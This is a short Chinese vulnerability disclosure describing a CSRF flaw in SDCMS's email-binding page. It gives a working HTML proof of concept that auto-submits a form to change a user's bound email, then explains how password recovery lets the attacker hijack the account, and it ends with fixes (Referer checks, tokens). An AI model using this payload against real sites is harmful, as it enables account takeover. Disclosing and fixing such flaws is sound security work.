SDCMS邮件绑定csrf可劫持账户 1、在SDCMS的邮件绑定处,未作任何防御,导致csrf poc: htmlbodyform id=xfkxfk name=xfkxfk action=http://localhost/sdcms/user/email.asp?act=checkdb method=POSTinput type=text name=email value=88888888@qq.com /input
1、在SDCMS的邮件绑定处,未作任何防御,导致csrf

poc:
<html> <body> <form id="xfkxfk" name="xfkxfk" action="http://localhost/sdcms/user/email.asp?act=checkdb" method="POST"> <input type="text" name="email" value="88888888@qq.com" /> <input type="submit" value="submit"> </form> <script> document.xfkxfk.submit(); </script> </body> </html>
2、我们在本地打开poc:

3、然后看看邮箱,成功修改:

4、由于通过csrf可以绑定任意用户任意邮箱,所以可以通过找回密码,发送密码到我们绑定的邮箱中,从而劫持会员账户。
修复方案:
1、判断请求的referer
1、判断请求的referer
2、在url中加上token